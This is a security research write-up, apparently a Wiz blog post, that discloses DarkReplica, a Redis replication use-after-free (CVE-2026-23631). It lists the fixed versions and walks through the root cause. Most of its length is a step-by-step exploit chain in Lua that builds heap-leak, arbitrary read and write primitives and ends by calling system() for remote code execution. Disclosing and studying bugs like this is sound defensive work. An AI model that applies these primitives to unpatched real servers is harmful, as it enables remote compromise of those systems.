ZeroDay.cloud

DarkReplica (CVE-2026-23631): Redis Use-After-Free Leads to Post-Auth RCE

Yoni Sherez, Jun 2, 21 min read


In December 2025, I participated in the ZeroDay.Cloud 2025 competition in London. I chose to target Redis (post-authentication) because of its complexity and its large, interesting attack surface. During my research, I found DarkReplica (CVE-2026-23631), a post-authentication Use-After-Free vulnerability in the replication subsystem of the Redis server. Exploiting it involves making the target server a "slave" of an attacker-controlled server (using the SLAVEOF command), and then abusing a logic flaw in the synchronization process, which leads to a Use-After-Free (UAF) in the Lua functions engine.

This writeup describes the root cause of the vulnerability, as well as the exploitation journey until achieving Remote Code Execution.

Remediation

Redis patched the bug on May 5, 2026. The fix was shipped across all five maintained release series.

Release series    Affected versions    Fixed version
Redis 7.2.x       7.2.0 – 7.2.13       7.2.14
Redis 7.4.x       7.4.0 – 7.4.8        7.4.9
Redis 8.2.x       8.2.0 – 8.2.5        8.2.6
Redis 8.4.x       8.4.0 – 8.4.2        8.4.3
Redis 8.6.x       8.6.0 – 8.6.2        8.6.3
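
To check a deployed version against the table above, a small helper can compare the patch number within each release series. This is a minimal sketch in Python; the names `FIXED` and `is_affected` are illustrative, the mapping is copied only from the table in this post, and versions outside the five listed series are reported as unknown rather than guessed.

```python
# Fixed patch level per release series, copied from the remediation table.
FIXED = {(7, 2): 14, (7, 4): 9, (8, 2): 6, (8, 4): 3, (8, 6): 3}


def is_affected(version: str):
    """Return True/False for a listed series, or None if the series is not in the table."""
    major, minor, patch = (int(part) for part in version.split("."))
    fixed_patch = FIXED.get((major, minor))
    if fixed_patch is None:
        return None  # series not covered by the table; do not guess
    return patch < fixed_patch


if __name__ == "__main__":
    for v in ("7.2.13", "7.2.14", "8.4.0", "8.6.3", "6.2.0"):
        print(v, is_affected(v))
```

The version string itself can be taken from the `redis_version` field of the `INFO server` output.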

Background

Redis's Built-In Lua Engine(s)

One of the most promising attack surfaces of Redis is the Lua engine. Redis includes a built-in Lua engine that allows developers to execute atomic functions on the server that can manipulate data. The Lua interpreter itself is a forked Lua 5.1 engine with some modifications made by Redis developers. Of course, Lua code runs in a sandboxed Lua environment in order to prevent remote code execution. In fact, Redis does not contain just one Lua engine, but two separate ones:

The scripting engine (SCRIPT LOAD/EVAL/EVALSHA/…)

The older model. It allows running scripts and storing them on the server, and then calling them again using their SHA1 hash. It also contains "LDB" (SCRIPT DEBUG), which is a Lua debugger implemented by Redis on top of Lua hooks.
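
The identifier used by EVALSHA is the SHA1 digest of the script body, so a client can compute it locally without asking the server. A minimal Python sketch of that computation (the helper name `script_sha1` is illustrative):

```python
import hashlib


def script_sha1(script: str) -> str:
    """Hex SHA1 digest of the script body, the identifier EVALSHA expects."""
    return hashlib.sha1(script.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    print(script_sha1("return KEYS[1] .. ' ' .. ARGV[1]"))
```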

127.0.0.1:6379> SCRIPT LOAD "return KEYS[1] .. ' ' .. ARGV[1]"
"406bf0497c622efb466704c62042f34776db84b7"
127.0.0.1:6379> EVALSHA 406bf0497c622efb466704c62042f34776db84b7 1 Hello World
"Hello World"

The functions engine (FUNCTION LOAD/FCALL/…)

The newer model. It allows registering libraries containing functions, which are then callable by name using FCALL. The functions engine has a generic design and might support other scripting languages in the future; currently, only Lua 5.1 is supported. Functions are also persistent (stored in RDB/AOF files, and synced with other cluster nodes), unlike scripts, which are only stored in memory.

127.0.0.1:6379> FUNCTION LOAD "#!lua name=mylib \n redis.register_function('myfunc', function(keys, argv) return keys[1] .. ' ' .. argv[1] end)"
"mylib"
127.0.0.1:6379> FUNCTION LIST
1) 1) "library_name"
   2) "mylib"
   3) "engine"
   4) "LUA"
   5) "functions"
   6) 1) 1) "name"
         2) "myfunc"
         3) "description"
         4) (nil)
         5) "flags"
         6) (empty array)
127.0.0.1:6379> FCALL myfunc 1 Hello World
"Hello World"
127.0.0.1:6379> FUNCTION FLUSH
OK
127.0.0.1:6379> FUNCTION LIST
(empty array)

For the sake of this writeup, I am going to focus specifically on the functions engine, but remember the scripting engine for later.

Vulnerability Root Cause Analysis

Slow Scripts

When executing arbitrary Lua code, an issue might arise: what if the code has some bug that makes it run for a very long time (or even forever)? Since Redis is a single-threaded server, this would block the server completely and deny service to other users. This is where FUNCTION KILL comes into play. After 5 seconds of executing a function, Redis prints the following log line:

1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds. You can try killing the script using the FUNCTION KILL command. Script name is: scam.

FUNCTION KILL terminates the currently executing function. An attentive reader might now ask: "Wait, you said that Redis is single-threaded! So how will it handle the FUNCTION KILL command while it's blocked?" The answer is that Redis installs a custom Lua hook function before executing the user script:

lua_sethook(lua, luaMaskCountHook, LUA_MASKCOUNT, 100000);

static void luaMaskCountHook(lua_State *lua, lua_Debug *ar) {
    if (scriptInterrupt(rctx) == SCRIPT_KILL) {
        // ...
    }
}

int scriptInterrupt(scriptRunCtx *run_ctx) {
    if (run_ctx->flags & SCRIPT_TIMEDOUT) {
        /* script already timedout
           we just need to process some events and return */
        processEventsWhileBlocked();
        return (run_ctx->flags & SCRIPT_KILLED) ? SCRIPT_KILL : SCRIPT_CONTINUE;
    }
    // ...
}

This hook executes every 100K Lua instructions. It checks whether the function has timed out (after 5 seconds by default) and, if so, calls processEventsWhileBlocked(), which handles pending events (for example, I/O events) from the Redis event loop. This is how the server is able to handle other connections while a Lua function is blocking it.
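
The hook mechanism can be modelled outside of Redis. The following is a toy Python sketch, not Redis code: `ToyInterpreter`, its fields, and the injectable `clock` are all illustrative names, and the timeout bookkeeping is simplified compared to scriptInterrupt(). It only shows the shape of the idea: a single-threaded loop that calls a hook every fixed number of instructions, and a hook that drains queued events once the time limit has passed.

```python
import time

HOOK_INTERVAL = 100_000  # instructions between hook calls, as in lua_sethook above
TIME_LIMIT_S = 5.0       # default slow-script threshold described above


class ToyInterpreter:
    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.pending_events = []  # callables standing in for queued I/O events
        self.timed_out = False
        self.killed = False
        self.hook_calls = 0

    def hook(self, started_at):
        """Called every HOOK_INTERVAL instructions; returns True if the run must stop."""
        self.hook_calls += 1
        if not self.timed_out and self.clock() - started_at >= TIME_LIMIT_S:
            self.timed_out = True
        if self.timed_out:
            # Stand-in for processEventsWhileBlocked(): drain queued events.
            while self.pending_events:
                self.pending_events.pop(0)(self)
        return self.killed

    def run(self, max_instructions):
        started_at = self.clock()
        for executed in range(1, max_instructions + 1):
            if executed % HOOK_INTERVAL == 0 and self.hook(started_at):
                return "killed"
        return "finished"
```

Queuing an event that sets `killed` plays the role of a FUNCTION KILL arriving while the function is blocking the server: it only takes effect at the next hook call after the timeout.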

This opens a door to many potential issues. For example: what if someone calls the FUNCTION FLUSH command while a slow function is running? Wouldn't it cause the server to release all Lua functions while one of them is being executed? Fortunately, Redis developers did see that coming:

int processCommand(client *c) {
    // ...

    /* when a busy job is being done (script / module)
     * Only allow a limited number of commands. */
    if (isInsideYieldingLongCommand() && !(c->cmd->flags & CMD_ALLOW_BUSY)) {
        // ...
        rejectCommand(c, shared.slowscripterr);
        // ...
    }

    // ...
}

There are only a few specific commands (including FUNCTION KILL and SCRIPT KILL) that can be executed during a timed-out function execution. When you try to execute a non-whitelisted command, you get the following error back:

(error) BUSY Redis is busy running a script. You can only call FUNCTION KILL or SHUTDOWN NOSAVE.

The Loophole

An interesting fact is that processEventsWhileBlocked() handles not only I/O events from regular clients, but all I/O events. So if the Redis server is a "slave" in the cluster, commands sent from the master server will also be handled! And there, nothing checks if a function is currently executing before performing state-changing operations.

Redis Replication

Redis allows assigning a "master server" to another server (using the SLAVEOF command). The slave server connects to the master and receives updates and full/partial synchronizations, in order to sync the full state of the server. The master can issue a PSYNC/FULLRESYNC with the slave at any given time, and then provide an RDB file (Redis's data serialization and storage format) that the slave will write locally and load.

RDB Structure

RDB is a fairly simple format. It contains a list of records, each consisting of an "opcode" followed by data laid out according to that opcode. These are the special RDB opcodes:

/* Special RDB opcodes (saved/loaded with rdbSaveType/rdbLoadType). */
#define RDB_OPCODE_SLOT_INFO  244   /* Individual slot info, such as slot id and size (cluster mode only). */
#define RDB_OPCODE_FUNCTION2  245   /* function library data */
#define RDB_OPCODE_FUNCTION_PRE_GA   246   /* old function library data for 7.0 rc1 and rc2 */
#define RDB_OPCODE_MODULE_AUX 247   /* Module auxiliary data. */
#define RDB_OPCODE_IDLE       248   /* LRU idle time. */
#define RDB_OPCODE_FREQ       249   /* LFU frequency. */
#define RDB_OPCODE_AUX        250   /* RDB aux field. */
#define RDB_OPCODE_RESIZEDB   251   /* Hash table resize hint. */
#define RDB_OPCODE_EXPIRETIME_MS 252    /* Expire time in milliseconds. */
#define RDB_OPCODE_EXPIRETIME 253       /* Old expire time in seconds. */
#define RDB_OPCODE_SELECTDB   254   /* DB number of the following keys. */
#define RDB_OPCODE_EOF        255   /* End of the RDB file. */
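
To make the record structure concrete, here is a small Python sketch that checks the RDB header (the "REDIS" magic followed by a four-digit version) and names a type byte using the opcode values listed above. The function names are illustrative, and the sketch does not parse record bodies.

```python
# Special opcode values copied from the listing above.
RDB_OPCODES = {
    244: "SLOT_INFO", 245: "FUNCTION2", 246: "FUNCTION_PRE_GA",
    247: "MODULE_AUX", 248: "IDLE", 249: "FREQ", 250: "AUX",
    251: "RESIZEDB", 252: "EXPIRETIME_MS", 253: "EXPIRETIME",
    254: "SELECTDB", 255: "EOF",
}


def parse_header(data: bytes) -> int:
    """Check the 'REDIS' magic and return the RDB version from the 9-byte header."""
    if len(data) < 9 or data[:5] != b"REDIS":
        raise ValueError("not an RDB payload")
    return int(data[5:9].decode("ascii"))


def classify_type_byte(type_byte: int) -> str:
    """Name a special opcode; any other byte is treated as a value type here."""
    return RDB_OPCODES.get(type_byte, f"value type {type_byte}")


if __name__ == "__main__":
    print(parse_header(b"REDIS0011"), classify_type_byte(245))
```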

RDB Functions Synchronization

As you might guess, I chose to focus on the RDB_OPCODE_FUNCTION2 opcode. The slave should always sync its functions and libraries with the master. So for each defined Lua "library" in the master, a record with opcode RDB_OPCODE_FUNCTION2 is sent to the slave together with the relevant Lua code. The slave immediately loads it:

} else if (type == RDB_OPCODE_FUNCTION2) {
    sds err = NULL;
    if (rdbFunctionLoad(rdb, rdbver, rdb_loading_ctx->functions_lib_ctx, rdbflags, &err) != C_OK) {
        serverLog(LL_WARNING,"Failed loading library, %s", err);
        sdsfree(err);
        goto eoferr;
    }
    continue;
}

Under normal circumstances, when performing a FULLRESYNC, emptyData() will be called to empty the server before loading the new RDB. It will then call functionsLibCtxClearCurrent(), which will free the current functions context and related objects, and initialize a new one:

void functionsLibCtxClearCurrent(int async) {
    if (async) {
        functionsLibCtx *old_l_ctx = curr_functions_lib_ctx;
        dict *old_engines = engines;
        freeFunctionsAsync(old_l_ctx, old_engines);
    } else {
        functionsLibCtxFree(curr_functions_lib_ctx);
        dictRelease(engines); // <-------
    }
    functionsInit();
}

/* Free the given functions ctx */
void functionsLibCtxFree(functionsLibCtx *functions_lib_ctx) {
    functionsLibCtxClear(functions_lib_ctx);
    dictRelease(functions_lib_ctx->functions);
    dictRelease(functions_lib_ctx->libraries);
    dictRelease(functions_lib_ctx->engines_stats);
    zfree(functions_lib_ctx);
}

The dictRelease(engines) call will free() the current lua_State object (the global Lua interpreter object)! Then, the new functions from the RDB will be loaded into the newly initialized functions context. When loading an RDB_OPCODE_FUNCTION2, rdb_loading_ctx->functions_lib_ctx (the server functions context) is not the global context, but a new one. At the end of the RDB load, the global context will be replaced with the new one.

After returning from processEventsWhileBlocked(), our Lua function will continue running, but now with a completely freed Lua engine.
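
The asymmetry between the two paths can be summarised in a toy model. The Python sketch below is not Redis code: `ToyServer`, `Engine`, and all method names are illustrative, and the allow-list is reduced to three commands. It models a client command being rejected by the busy check while a full resync, arriving through the same event processing, replaces the engine under the running function.

```python
class Engine:
    """Stand-in for the Lua engine; `freed` marks memory that was released."""
    def __init__(self):
        self.freed = False


class ToyServer:
    def __init__(self):
        self.engine = Engine()
        self.busy = False
        self.log = []

    def process_client_command(self, name):
        # Mirrors the processCommand() gate: only a few commands pass while busy.
        if self.busy and name not in ("FUNCTION KILL", "SCRIPT KILL", "SHUTDOWN"):
            self.log.append(f"{name}: BUSY")
            return
        if name == "FUNCTION FLUSH":
            self.clear_functions()

    def handle_full_resync(self):
        # Replication path: no busy check before the server state is emptied.
        self.clear_functions()
        self.log.append("full resync: engine replaced")

    def clear_functions(self):
        self.engine.freed = True  # old engine released
        self.engine = Engine()    # fresh one initialised

    def run_slow_function(self, events):
        running_on = self.engine  # the function keeps using this engine
        self.busy = True
        for event in events:      # stand-in for processEventsWhileBlocked()
            event(self)
        self.busy = False
        return running_on.freed   # True: the function resumed on freed state
```

In the model, `run_slow_function` returning True corresponds to the function continuing on a released engine, which in the real server is the use-after-free.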

Triggering the Vulnerability

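So the plan is as follows: make the target a slave of an attacker-controlled server with SLAVEOF, run a slow function on it until the timeout hook starts calling processEventsWhileBlocked(), and have the master respond with a full synchronization so that emptyData() frees the Lua engine while the function is still executing.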

Sure enough, we get a beautiful crash dump:

1:S 33 Jul 2025 13:37:13.337 * Before turning into a replica, using my own master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 33 Jul 2025 13:37:13.337 * Connecting to MASTER 172.18.0.1:8474
1:S 33 Jul 2025 13:37:13.337 * MASTER <-> REPLICA sync started
...
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds.
...
=== REDIS BUG REPORT START: Cut & paste starting from here ===
1:S 33 Jul 2025 13:37:13.337 # Redis 8.4.0 crashed by signal: 11, si_code: 128
1:S 33 Jul 2025 13:37:13.337 # Accessing address: (nil)
1:S 33 Jul 2025 13:37:13.337 # Crashed running the instruction at: 0x648a03093f37

Exploitation

The primitive we achieved is executing a Lua function while it, its state, its "stack", and every object related to it are all freed! While this is a very strong primitive, it is also chaotic by nature. The lua_State is a fairly complex object with references to many other objects (of various sizes). Very precise heap control is necessary to allocate all of these objects in exactly the right way, so that the program does not accidentally crash at some point.

Furthermore, there are objects that we just cannot fake without requiring some more primitives. For example, every Lua operation that involves allocating memory calls lua_State->l_G->frealloc(), which is basically a custom malloc() callback. We still do not have an ASLR leak, so we cannot write a valid pointer to executable memory there.

The Lua VM

Before we dive into the exploitation itself, we have to first introduce some core concepts of the Lua VM.

Lua has its own bytecode format that runs in a register-based VM. It also has a stack that contains called functions, arguments to functions, local variables, and the "registers" themselves (which are just dedicated positions on the function stack frame). Every Lua bytecode instruction manipulates some variables on the stack. For example:
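
As a rough illustration of the register model, here is a toy Python interpreter for three instruction shapes. It is a simplified sketch, not the real Lua 5.1 encoding: instructions are plain tuples, ADD only takes register operands, and the function name `run` is illustrative. The point is that "registers" are just slots of the current stack frame.

```python
def run(code, constants, num_registers):
    """Execute a tiny subset of register-style instructions on one stack frame."""
    stack = [None] * num_registers  # registers are slots of the frame
    for op, a, b, c in code:
        if op == "LOADK":           # R(A) := K(B)
            stack[a] = constants[b]
        elif op == "MOVE":          # R(A) := R(B)
            stack[a] = stack[b]
        elif op == "ADD":           # R(A) := R(B) + R(C)
            stack[a] = stack[b] + stack[c]
        else:
            raise ValueError(f"unsupported op {op}")
    return stack


program = [
    ("LOADK", 0, 0, None),  # R0 = first constant
    ("LOADK", 1, 1, None),  # R1 = second constant
    ("ADD", 2, 0, 1),       # R2 = R0 + R1
    ("MOVE", 0, 2, None),   # R0 = R2
]

if __name__ == "__main__":
    print(run(program, [40, 2], 3))
```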

Lua 5.1 also features an incremental GC implementation, which we won't dive into, as it's not directly relevant to our exploit.

Primitives

Returning to our exploitation strategy: besides the UAF primitive, we also have a few small memory primitives that will help us later.

Heap Address Leakage

Fortunately for us, Lua's default tostring() function returns pointers for values which are not strings or numbers!

tostring({})
-- table: 0x634b5724c340

This is, in fact, a pointer to the GCObject structure, which is a union that can represent all existing Lua object types.

typedef struct lua_TValue {
    Value value;
    int tt;  // type
} TValue;

typedef union {
    GCObject *gc;
    void *p;
    lua_Number n;  // for number values
    int b;
} Value;

union GCObject {
    GCheader gch;  // GC header
    union TString ts;  // for string values
    union Udata u;  // for userdata values
    union Closure cl;  // for function values
    struct Table h;  // for table values
    struct Proto p;  // for function prototypes
    struct UpVal uv;  // for function upvals
    struct lua_State th;  // for "threads" (coroutines)
};

malloc()

We can build a malloc() primitive — the ability to allocate an arbitrary string in memory and know its address.

The tostring() function does not return a pointer for string values, so we cannot leak a string's address directly. However, the default allocator for Redis is Jemalloc, and as a result of its tcache implementation (and thanks to Redis being single-threaded), when we free() an object and then malloc() an object of the same size class, we deterministically get the same address back.

local a = coroutine.create(function() end)  -- Allocates a coroutine
local addr = tostring(a)  -- Saves the address for its lua_State object (size 184)
a = nil  -- Removes the reference to the coroutine object
collectgarbage("collect")  -- Triggers the GC, which will free the lua_State object
a = "AAAAAA..." .. "A"  -- Allocates a string with our payload of size 184 - sizeof(TString) (the string header)
-- Our buffer is now allocated in the same address as the freed coroutine (which we know) + sizeof(TString)

We use CONCAT (..) in order to allocate the string when we need it, otherwise it would just be saved as a function constant at compilation time and wouldn't get allocated again.

Because the functions engine is about to be freed, we use the separate Lua scripting engine (remember?) in order to allocate our objects, and then turn its GC off to prevent it from releasing our objects.

After allocating on top of the vulnerable freed lua_State, this primitive will also allow us to control the whole "tree of objects" (control other objects it references), since we can now write data to the heap at known addresses.
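
The allocator behaviour this primitive relies on can be modelled in a few lines. The Python sketch below is a toy, not Jemalloc: `ToyTcache` is an illustrative name, addresses are made up, and the 192-byte class is an assumption about where a 184-byte request would land. It only demonstrates the last-in, first-out reuse within a size class.

```python
class ToyTcache:
    """Per-size-class LIFO cache: the most recently freed chunk is handed out first."""

    def __init__(self, base=0x1000):
        self.next_fresh = base
        self.bins = {}   # size class -> stack of freed addresses
        self.sizes = {}  # address -> size class

    def malloc(self, size_class):
        cached = self.bins.get(size_class)
        if cached:
            return cached.pop()  # reuse the last freed chunk of this class
        addr = self.next_fresh
        self.next_fresh += size_class
        self.sizes[addr] = size_class
        return addr

    def free(self, addr):
        self.bins.setdefault(self.sizes[addr], []).append(addr)


if __name__ == "__main__":
    heap = ToyTcache()
    coroutine_state = heap.malloc(192)  # address leaked via tostring()
    heap.free(coroutine_state)          # garbage collector releases it
    payload = heap.malloc(192)          # string of the same size class
    print(hex(coroutine_state), hex(payload))
```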

Allocating the Freed Buffers

We need to "spray" the heap in order to allocate on top of the just-freed objects. Redis has a separate Jemalloc arena for Lua scripts, which means only Lua objects can "exploit" our UAF. Fortunately for us, the next thing that happens after freeing the Lua engine is, conveniently, loading our RDB. As explained above, our RDB can contain RDB_OPCODE_FUNCTION2 records which contain Lua function registration code that will get executed immediately. This script is controlled by us and can allocate objects in order to spray the heap and allocate on top of the freed objects we need.

Taking Control Over the Lua VM

So now we have everything we need. Let's allocate on top of the freed lua_State!

Another issue arises: remember what we said about Jemalloc's tcache? The next object that gets allocated right after freeing the old engine's lua_State is the new one. As expected, it deterministically gets allocated on top of the old one. :(

To work around this issue, we can abuse Lua coroutines — Lua's implementation of "threads", which are not really threads, but more like function generators that can be resumed, pause execution in the middle, and yield results.

local co = coroutine.create(function(x)
    for i = 1, x do
        coroutine.yield(i)
    end
end)

local success, a = coroutine.resume(co, 5)
print(a)  -- 1
success, a = coroutine.resume(co)
print(a)  -- 2
-- ...

What's interesting here is that every coroutine runs in its own lua_State. So if we run our slow function (the one that gets freed) inside a coroutine, then even after the new engine's lua_State object is allocated on top of the old one, we will still be able to allocate on top of the coroutine's lua_State and take control of the function's Lua VM.

#!lua name=mylib

redis.register_function("hoax", function()
    local co = coroutine.create(function(a)
        -- This function runs in a separate lua_State
        while 1 do end
    end)
    coroutine.resume(co)
end)

Stabilizing the VM

We can now execute arbitrary Lua opcodes in a custom Lua environment with our own fake objects on the stack. We are getting close.

The next issue is that we are very limited in what we can actually do without crashing the program, because of various constraints (e.g., the frealloc() issue explained above). "Stabilizing" the VM will help us a lot. For that, we can use another trick related to Lua coroutines.

Let's build the following Lua stack layout:

[0] LUA_TFUNCTION - coroutine.resume
[1] LUA_TTHREAD   - stage3_co
[2] LUA_TTABLE    - fakeobj1
[3] LUA_TTABLE    - fakeobj2
...

Then, we can execute the following single Lua instruction:

CALL R0 4 1

This will execute coroutine.resume(stage3_co, fakeobj1, fakeobj2). Then, our function will continue execution in the (non-freed) coroutine's lua_State, while receiving our arbitrary fake objects as arguments!

We've just transferred our fake Lua objects from the "broken" Lua engine to another clean Lua engine!
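
For readers unfamiliar with the operands of CALL, the following Python sketch encodes and decodes the instruction using the stock Lua 5.1 iABC layout. It assumes that the Redis fork keeps the stock opcode numbering and field layout; the function names are illustrative.

```python
OP_CALL = 28  # opcode number of CALL in stock Lua 5.1 (lopcodes.h)


def encode_abc(op, a, b, c):
    """Pack an iABC instruction: op in bits 0-5, A in 6-13, C in 14-22, B in 23-31."""
    return op | (a << 6) | (c << 14) | (b << 23)


def decode_call(instr):
    """Return (function register, argument count, result count) for a CALL."""
    if instr & 0x3F != OP_CALL:
        raise ValueError("not a CALL instruction")
    a = (instr >> 6) & 0xFF
    c = (instr >> 14) & 0x1FF
    b = (instr >> 23) & 0x1FF
    # B-1 arguments follow the function register; C-1 results are kept.
    # B == 0 or C == 0 means "up to the top of the stack" and is not handled here.
    return a, b - 1, c - 1


if __name__ == "__main__":
    print(decode_call(encode_abc(OP_CALL, 0, 4, 1)))
```

With A=0, B=4, C=1, the function in R0 is called with the three values in R1 to R3 and no results are kept, which matches the coroutine.resume(stage3_co, fakeobj1, fakeobj2) call described above.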

Achieving a Write-What-Where Primitive

Now we can run Lua code in a fully functional environment and build fake objects. So, what objects can we fake? Let's take a look at the "table" (Lua's dictionary type) internal structures:

typedef struct Table {
    CommonHeader;
    lu_byte flags;  /* 1<<p means tagmethod(p) is not present */
    int readonly;
    lu_byte lsizenode;  /* log2 of size of `node' array */
    struct Table *metatable;
    TValue *array;  /* array part */
    Node *node;
    Node *lastfree;  /* any free position is before this position */
    GCObject *gclist;
    int sizearray;  /* size of `array' array */
} Table;

In Lua, the table type is actually usable as both an array and a dictionary. Elements with a number index are stored in the Table->array array, and Table->sizearray represents its size. If we set array to 0x4141414141414141 and sizearray to 1, executing fake_table[1] = 1337 (Note: Lua indexes start at 1) will copy the number's TValue to Table->array[0] — in our case, the controlled address 0x4141414141414141!

typedef struct lua_TValue {
    Value value;
    int tt;  // type
} TValue;

typedef union {
    GCObject *gc;
    void *p;
    lua_Number n;  // for number values
    int b;
} Value;

typedef double lua_Number;

For the Lua number type, TValue->tt == LUA_TNUMBER and TValue->value.n is the actual number (represented as a double).
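
The Lua snippets that follow use a uint64_to_double helper whose implementation is not shown in this post. A Python model of what such a helper computes is sketched below: it reinterprets the same eight bytes as a different type. The `pack_number_tvalue` function and the 16-byte layout (8-byte value, 4-byte tag, 4 bytes of padding) are assumptions for a typical 64-bit little-endian build.

```python
import struct

LUA_TNUMBER = 3  # type tag for numbers in Lua 5.1


def uint64_to_double(value: int) -> float:
    """Reinterpret the 8 bytes of an unsigned 64-bit integer as a double."""
    return struct.unpack("<d", struct.pack("<Q", value))[0]


def double_to_uint64(value: float) -> int:
    """Inverse of uint64_to_double."""
    return struct.unpack("<Q", struct.pack("<d", value))[0]


def pack_number_tvalue(number: float) -> bytes:
    """Lay out a number TValue: 8-byte value, 4-byte tag, 4 bytes of padding."""
    return struct.pack("<diI", number, LUA_TNUMBER, 0)


if __name__ == "__main__":
    as_double = uint64_to_double(0x4141414141414141)
    print(as_double, pack_number_tvalue(as_double).hex())
```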

We can build the following memory layout:

fake_table1:
    array: 0
    sizearray: 1

fake_table2:
    array: &fake_table1->array
    sizearray: 1

Then, execute the write primitive twice:

local function write(addr, val)
    fake_table2[1] = uint64_to_double(addr)  -- Override fake_table1's array pointer
    fake_table1[1] = uint64_to_double(val)
end

Achieving an Arbitrary Read Primitive

Executing local a = fake_table1[1] from Lua code will attempt to read a TValue from a given address and copy it to a local variable. The issue is it will also copy addr+8 (which is an arbitrary value) as the value type. We need the value to be LUA_TNUMBER in order to be able to read it as a number from Lua code.

So… let's fake some more tables!

fake_table3_array:
    - value: 0
      tt: 0
fake_table3:
    array: &fake_table3_array
fake_table4:
    array: &fake_table3->array[0].tt

Instead of assigning to a local variable, we can do fake_table3[1] = fake_table1[1]. This will copy the value we want to read to fake_table3_array->value and some random value to fake_table3_array->tt. Then, we do fake_table4[1] = uint64_to_double(3), whose raw bits overwrite the type field with 3 and "fix" it to be LUA_TNUMBER (since fake_table4->array points directly at fake_table3_array->tt). Now, we can just read fake_table3[1] as usual and get the value:

local function read(addr)
    fake_table2[1] = uint64_to_double(addr)  -- Override fake_table1's array pointer
    fake_table3[1] = fake_table1[1]  -- Read the value with a broken type to fake_table3[1]
    fake_table4[1] = uint64_to_double(3)  -- Fix fake_table3[1]'s type to be LUA_TNUMBER
    local val = fake_table3[1]  -- Read val as a double from fake_table3!
    val = double_to_buf(val)  -- Convert it to a buf to get raw data
    return val
end
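
The interplay of the four fake tables is easier to follow in a simulation. The Python sketch below is a toy model under stated assumptions: memory is a flat bytearray, each fake table is reduced to its array pointer, values are handled as raw 64-bit patterns instead of doubles, and all names and addresses (`ToyMemory`, `FakeTable`, the 0x00 to 0x40 layout) are illustrative rather than taken from the exploit.

```python
import struct

LUA_TNUMBER = 3  # number type tag in Lua 5.1


class ToyMemory:
    """Flat byte buffer standing in for process memory."""
    def __init__(self, size=256):
        self.buf = bytearray(size)

    def u32(self, addr):
        return struct.unpack_from("<I", self.buf, addr)[0]

    def u64(self, addr):
        return struct.unpack_from("<Q", self.buf, addr)[0]

    def put_u32(self, addr, value):
        struct.pack_into("<I", self.buf, addr, value)

    def put_u64(self, addr, value):
        struct.pack_into("<Q", self.buf, addr, value)


class FakeTable:
    """Only the `array` pointer of a table, stored at `field_addr` in memory."""
    def __init__(self, mem, field_addr, array_ptr):
        self.mem, self.field_addr = mem, field_addr
        mem.put_u64(field_addr, array_ptr)

    def slot(self):
        return self.mem.u64(self.field_addr)  # address of array[0]

    def set_number(self, bits):               # models t[1] = uint64_to_double(bits)
        slot = self.slot()
        self.mem.put_u64(slot, bits)
        self.mem.put_u32(slot + 8, LUA_TNUMBER)

    def copy_from(self, other):               # models t[1] = other[1] (value and tag)
        src, dst = other.slot(), self.slot()
        self.mem.buf[dst:dst + 12] = self.mem.buf[src:src + 12]

    def get_number(self):                     # models reading t[1] as a number
        slot = self.slot()
        if self.mem.u32(slot + 8) != LUA_TNUMBER:
            raise TypeError("slot does not hold a number")
        return self.mem.u64(slot)


def build(mem):
    t1 = FakeTable(mem, 0x00, 0)
    t2 = FakeTable(mem, 0x10, 0x00)  # array -> &fake_table1.array
    t3 = FakeTable(mem, 0x20, 0x40)  # array -> fake_table3_array
    t4 = FakeTable(mem, 0x30, 0x48)  # array -> &fake_table3_array[0].tt
    return t1, t2, t3, t4


def write(tables, addr, value):
    t1, t2, _, _ = tables
    t2.set_number(addr)   # retarget fake_table1's array pointer
    t1.set_number(value)


def read(tables, addr):
    t1, t2, t3, t4 = tables
    t2.set_number(addr)          # retarget fake_table1's array pointer
    t3.copy_from(t1)             # copy value plus an arbitrary tag
    t4.set_number(LUA_TNUMBER)   # overwrite the tag with 3
    return t3.get_number()
```

Note that every number store also writes a 4-byte tag right after the 8-byte value, so each pointer field in the toy layout is followed by spare bytes that may be clobbered.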

Achieving Code Execution

Now that we have a Lua function running in a stable VM with memory read/write capability and addresses of Lua heap objects, the path to code execution is quite trivial.

We have endless paths to proceed with. My two favorites are:

We still do not have libc pointers, so we cannot calculate its ASLR offset, and the redis-server binary does not contain a PLT stub for system(). Instead, we can leak a libc address through the binary's GOT and compute the address of system() from it:

local os_clock = read(toaddr(os.clock) + offsetof(CClosure, f), true)  -- Read address of a C function in the redis-server binary
local redis_server_base = os_clock - offsets["redis-server"]["os_clock"]
local umask_got = redis_server_base + offsets["redis-server"]["umask@got.plt"]
local umask = read(umask_got, true)
local libc_base = umask - offsets["libc"]["umask"]
local system = libc_base + offsets["libc"]["system"]

local fake_l_G = malloc_184()
write(fake_l_G + offsetof(global_State, frealloc), system)
write(fake_l_G + offsetof(global_State, ud), command_payload_addr)
-- ...some more writes...

local co = coroutine.create(function() end)
local co_addr = toaddr(co)
write(co_addr + offsetof(lua_State, l_G), fake_l_G)
-- ...some more writes...

coroutine.resume(co)  -- Executes system()!

Conclusions

In this writeup, we walked through Redis's Lua engines and replication subsystem, some of the Lua 5.1 engine's internals, the root cause of the DarkReplica vulnerability, and the full exploitation path to achieve Remote Code Execution.

The vulnerability abuses a logic flaw in Redis's replication process, and demonstrates the complexity of achieving "concurrency" in complicated software with a lot of moving parts. The exploit itself also includes some powerful generic Lua VM exploitation primitives and techniques.

DarkReplica was submitted to the ZeroDay.Cloud 2025 competition in London, where it was awarded $30,000.

Redis patched this vulnerability in versions 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3. Patch your instance ASAP.

The full exploit code can be found here.

How Wiz Can Help

Wiz customers can use the pre-built query and advisory in the Wiz Threat Center to assess the risk in their environment.

Wiz identifies both internal and publicly exposed Redis instances in your environment affected by CVE-2026-23631, and alerts you to instances that have been misconfigured to allow unauthenticated access or use weak or default passwords.

Timeline